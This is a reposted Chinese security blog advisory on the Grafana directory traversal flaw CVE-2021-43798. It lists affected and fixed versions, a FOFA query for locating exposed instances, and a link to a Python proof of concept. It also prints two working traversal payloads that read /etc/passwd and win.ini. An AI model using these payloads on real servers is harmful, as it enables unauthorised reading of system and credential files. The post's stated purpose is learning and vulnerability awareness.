Grafana 任意文件读取 CVE-2021-43798漏洞利用

admin 2022年3月25日23:53:59评论181 views字数 853阅读2分50秒阅读模式


Grafana 任意文件读取 CVE-2021-43798漏洞利用

01


应用简述

Grafana 是一款完全开源的前端图形化工具,其主要作用就是为了监控各类数据,并展示出易观察的界面。

Grafana 任意文件读取 CVE-2021-43798漏洞利用

02

漏洞相关

Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:`{url}/public/plugins/{id}`,id为任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。


CVE编号:CVE_2021_43798


影响版本:Grafana 8.0.0到8.3.0(补丁版本除外)

修复版本:Grafana 8.0.7、8.1.8、8.2.7、 8.3.1

Grafana 任意文件读取 CVE-2021-43798漏洞利用

03

漏洞复现

FOFA:app="Grafana_Labs-公司产品"


POC:

linux:/public/plugins/{id}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd


windows:/public/plugins/{id}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fc:/windows/win.ini

Grafana 任意文件读取 CVE-2021-43798漏洞利用

03

GITHUB POC

ps:python编写的poc

github:

https://github.com/hdsweeeeeees/python_poc/blob/main/CVE-2021-43798

结语

喜欢的朋友可以点个关注,后续关注相关文章~


此文目的在于借鉴学习,并不代表此文以及作者对本文提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

本文作者拥有有对此文章的修改和解释权,未经作者允许不得以任何方式将其用于商业目的,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容。


谢谢阅读



原文始发于微信公众号(不会联盟):Grafana 任意文件读取 CVE-2021-43798漏洞利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月25日23:53:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Grafana 任意文件读取 CVE-2021-43798漏洞利用http://cn-sec.com/archives/841636.html

发表评论

匿名网友 填写信息